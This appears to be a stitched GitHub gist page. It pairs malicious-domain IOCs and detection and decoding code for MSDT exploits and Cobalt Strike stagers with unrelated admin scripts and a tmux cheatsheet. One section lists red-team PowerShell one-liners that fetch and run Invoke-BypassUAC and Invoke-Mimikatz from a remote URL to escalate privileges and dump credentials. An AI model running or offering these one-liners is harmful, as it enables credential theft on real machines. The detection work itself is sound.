Marc Ströbel phroxvs

  • HvS-Consulting AG
  • Munich, Germany

Malicious websites impersonating legitimate software

Domain names:

138.124.183.79.sslip.io
7-zip.cfd
7-zip.day
advanced-ip-scanner.cfd
advanced-ip-scanner.link
advancedipscannerapp.com
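A list like the one above only earns its keep once it is matched against telemetry. The Python below is an added example, not part of the gist: it matches DNS query names against these domains, treating every entry as also covering its subdomains, and, because sslip.io encodes an IPv4 address in the hostname (dotted form, dashed form, or dashed with a prefix label), it also flags any other sslip.io name that resolves to the same address as the listed one. The log format and the log lines are constructed for the example.

```python
from __future__ import annotations

import re

# Domains copied from the list above (the gist's own IOC set).
BLOCKLIST = {
    "138.124.183.79.sslip.io",
    "7-zip.cfd",
    "7-zip.day",
    "advanced-ip-scanner.cfd",
    "advanced-ip-scanner.link",
    "advancedipscannerapp.com",
}

# sslip.io answers a.b.c.d.sslip.io, a-b-c-d.sslip.io and prefix-a-b-c-d.sslip.io with a.b.c.d.
SSLIP_RE = re.compile(
    r"(?:^|[.-])(\d{1,3})[.-](\d{1,3})[.-](\d{1,3})[.-](\d{1,3})\.sslip\.io$"
)


def normalize(host: str) -> str:
    """Lower-case, drop a trailing dot (FQDN form) and an optional :port."""
    host = host.strip().lower().rstrip(".")
    return host.rsplit(":", 1)[0] if ":" in host else host


def sslip_ip(host: str) -> str | None:
    """Return the IPv4 address an sslip.io hostname encodes, or None."""
    m = SSLIP_RE.search(normalize(host))
    return ".".join(m.groups()) if m else None


# Pivot table: IPv4 address -> the blocklist entry that encodes it.
SSLIP_BLOCKED_IPS: dict[str, str] = {}
for _entry in BLOCKLIST:
    _ip = sslip_ip(_entry)
    if _ip:
        SSLIP_BLOCKED_IPS[_ip] = _entry


def match_blocklist(host: str) -> str | None:
    """Return the blocklist entry covering host (exact or parent domain), else None.
    The bare TLD is never tried, so 'cfd' alone cannot match."""
    host = normalize(host)
    labels = host.split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in BLOCKLIST:
            return candidate
    # Same sslip.io-encoded address spelled differently (dashed form, prefixed form).
    ip = sslip_ip(host)
    if ip in SSLIP_BLOCKED_IPS:
        return SSLIP_BLOCKED_IPS[ip]
    return None


# Constructed DNS query log (timestamp, client, qname); not real telemetry.
SAMPLE_DNS_LOG = """\
2024-06-01T10:00:01Z 10.1.2.3 www.7-zip.org
2024-06-01T10:00:05Z 10.1.2.3 7-zip.cfd
2024-06-01T10:00:09Z 10.1.2.7 cdn.advanced-ip-scanner.link.
2024-06-01T10:00:12Z 10.1.2.9 138-124-183-79.sslip.io
2024-06-01T10:00:15Z 10.1.2.9 advanced-ip-scanner.com
"""


def scan_dns_log(text: str) -> list[tuple[str, str, str]]:
    """Return (client, queried name, matching blocklist entry) for every hit."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        _ts, client, qname = parts[:3]
        entry = match_blocklist(qname)
        if entry:
            hits.append((client, normalize(qname), entry))
    return hits


if __name__ == "__main__":
    for client, qname, entry in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{client} queried {qname} -> matches {entry}")
```

Note that the vendor's real domain, advanced-ip-scanner.com, is deliberately not a hit: matching is on full labels from the right, never on the brand substring, so the legitimate site is not flagged by accident.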
@kevthehermit
kevthehermit / detection.yml
Last active September 16, 2022 22:55
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
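The preview cuts the rule off at `logsource:`, so its detection block is not on the page. As an added example (my own logic, not kevthehermit's rule), the Python below applies the idea in the gist title, Office --> MSDT, to constructed Sysmon process-creation (Event ID 1) records: it alerts when msdt.exe has an Office parent, and separately when a command line carries the ms-msdt protocol-handler arguments, so an intermediary process between Office and msdt.exe does not blind the check. The Office image set, the command-line markers, the record format and the sample events are all assumptions made for the example.

```python
from __future__ import annotations

# Office images that have no business launching the diagnostics tool (assumed set).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Substrings of an ms-msdt protocol-handler invocation (assumed markers, matched case-insensitively).
CMDLINE_MARKERS = ("ms-msdt:", "pcwdiagnostic", "it_rebrowseforfile=")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict[str, str]:
    """Parse one constructed 'Key=Value|Key=Value' Sysmon event line into a dict.
    Only the first '=' in each field separates key from value, so '=' inside a
    command line survives."""
    fields: dict[str, str] = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def evaluate(ev: dict[str, str]) -> list[str]:
    """Return the reasons an event matches; an empty list means no alert."""
    if ev.get("EventID") != "1":          # process creation only
        return []
    reasons = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    if image == "msdt.exe" and parent in OFFICE_IMAGES:
        reasons.append(f"msdt.exe spawned by Office process {parent}")
    if any(marker in cmd for marker in CMDLINE_MARKERS):
        reasons.append("ms-msdt protocol-handler arguments on the command line")
    return reasons


def scan(lines: list[str]) -> list[dict]:
    """Run evaluate() over every line and keep the events that produced reasons."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = evaluate(ev)
        if reasons:
            hits.append({"event": ev, "reasons": reasons})
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # Word launching msdt with protocol-handler arguments: both conditions fire.
    "EventID=1|Image=C:\\Windows\\System32\\msdt.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|CommandLine=\"C:\\Windows\\System32\\msdt.exe\" ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=placeholder\"",
    # A user opening a troubleshooter from Explorer: benign.
    "EventID=1|Image=C:\\Windows\\System32\\msdt.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=\"C:\\Windows\\System32\\msdt.exe\" /id NetworkDiagnosticsWeb",
    # Word spawning the 32-bit print helper: benign.
    "EventID=1|Image=C:\\Windows\\splwow64.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|CommandLine=C:\\Windows\\splwow64.exe 12288",
    # Network-connection event from Word: wrong event type, ignored by design.
    "EventID=3|Image=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|DestinationIp=203.0.113.5",
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["event"]["Image"], "<-", hit["event"].get("ParentImage", "?"))
        for reason in hit["reasons"]:
            print("   ", reason)
```

The parent-image condition is the high-confidence one; the command-line condition is broader and will also catch a script host or shell invoking the handler on Office's behalf, at the cost of needing a check against your own admin tooling before it is promoted from experimental.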
@0xtornado
0xtornado / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created April 30, 2020 14:11
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
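Read step by step, the recipe does this: if the input already contains `bxor` it is the gunzipped inner script, so jump straight to Decode_Shellcode; otherwise base64-decode the `-EncodedCommand` blob, decode it as UTF-16LE, pull out the long base64 run, base64-decode and gunzip it to obtain the inner script; then pull out that script's base64 byte array, decode it and XOR every byte with 35. The Python below is an added re-implementation of those steps so they can be scripted over many samples; it is neither 0xtornado's recipe nor Cobalt Strike code. One deliberate difference: where CyberChef's "List matches" concatenates every run of 30 or more base64 characters, this keeps only the longest run, so identifier-like runs such as `FromBase64String` can never pollute the decode. `build_constructed_stager` builds a synthetic three-layer input for testing and contains no real beacon.

```python
from __future__ import annotations

import base64
import gzip
import re

# Same character class and minimum length as the recipe's "Regular expression" steps.
B64_RUN = re.compile(r"[A-Za-z0-9+/=]{30,}")
XOR_KEY = 35  # the key in the recipe's final XOR step


def longest_b64_run(text: str) -> str:
    """Take the longest 30+ character base64 run (CyberChef lists and concatenates all of them)."""
    runs = B64_RUN.findall(text)
    if not runs:
        raise ValueError("no base64 run of 30+ characters found")
    return max(runs, key=len)


def decode_beacon(encoded_command: str) -> str:
    """Decode_beacon branch: -EncodedCommand base64 -> UTF-16LE text -> inner base64 -> gunzip.
    Returns the PowerShell script that carries the XORed shellcode."""
    outer = base64.b64decode(longest_b64_run(encoded_command)).decode("utf-16-le")
    inner = base64.b64decode(longest_b64_run(outer))
    return gzip.decompress(inner).decode("utf-8", errors="replace")


def decode_shellcode(script: str, key: int = XOR_KEY) -> bytes:
    """Decode_Shellcode branch: base64 byte array in the script -> XOR every byte with key."""
    raw = base64.b64decode(longest_b64_run(script))
    return bytes(b ^ key for b in raw)


def extract_shellcode(blob: str, key: int = XOR_KEY) -> bytes:
    """Top-level recipe: the conditional jump sends input that already contains 'bxor'
    (the gunzipped inner script) straight to Decode_Shellcode."""
    if "bxor" in blob:
        return decode_shellcode(blob, key)
    return decode_shellcode(decode_beacon(blob), key)


def build_constructed_stager(shellcode: bytes, key: int = XOR_KEY) -> str:
    """Constructed test input with the same three layers the recipe expects.
    Synthetic only: the layout mimics a stager, the payload is whatever bytes are passed in."""
    xored_b64 = base64.b64encode(bytes(b ^ key for b in shellcode)).decode()
    inner_script = (
        f"[Byte[]]$var_code = [System.Convert]::FromBase64String('{xored_b64}')\n"
        f"for ($x = 0; $x -lt $var_code.Count; $x++) {{ $var_code[$x] = $var_code[$x] -bxor {key} }}\n"
    )
    # mtime=0 keeps the gzip header (and thus the outer blob) deterministic between runs.
    gz_b64 = base64.b64encode(gzip.compress(inner_script.encode(), mtime=0)).decode()
    outer_script = (
        f'$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("{gz_b64}"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
    )
    return base64.b64encode(outer_script.encode("utf-16-le")).decode()


if __name__ == "__main__":
    sample = bytes(range(0x40, 0x60))   # stand-in bytes, not shellcode
    stager = build_constructed_stager(sample)
    print(extract_shellcode(stager).hex())
```

Feed `extract_shellcode` the bare base64 argument of `-EncodedCommand`, or the whole command line: because the longest run is selected, the surrounding `powershell -nop -w hidden` text is ignored, which the original recipe's first From Base64 step would not tolerate. The XOR key is per-profile, so pass `key=` when 35 does not yield sensible bytes.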
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@ethzero
ethzero / PSFileTransferByClipboard.ps1
Last active August 22, 2023 11:45
Transferring binary content by way of clipboard via Powershell
## PowerShell method of transferring small (< 1 MB) binary files via Clipboard
##
## NB: Unwise to attempt to encode binary files exceeding 1 MB due to excessive memory consumption
## Requires PowerShell 5.0 or later (Set-Clipboard / Get-Clipboard)
# On the transmission end:
# -Encoding Byte exists in Windows PowerShell 5.x only; PowerShell 7 replaced it with -AsByteStream.
# Add -ReadCount 0 to receive one byte[] instead of one pipeline object per byte (faster, less memory).
$Content = Get-Content -Encoding Byte -Path binaryfile.xxx
[System.Convert]::ToBase64String($Content) | Set-Clipboard
# On the receiving end
@jschpp
jschpp / oab.ps1
Last active November 16, 2022 09:21
Deletes OAB locally and deactivates automatic OAB download for prompted user
# This script removes the local Offline Address Book files and sets the
# registry key to disable automatic download of the OAB
$OFS = "`r`n`r`n"
# LoadWithPartialName is obsolete; Add-Type -AssemblyName Microsoft.VisualBasic is the supported equivalent
[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') | Out-Null
try {
$username = [Microsoft.VisualBasic.Interaction]::InputBox("Input username", "User", "")
$User = New-Object System.Security.Principal.NTAccount($username)
$sid = $User.Translate([System.Security.Principal.SecurityIdentifier]).value
} catch {
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active July 2, 2024 13:33
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname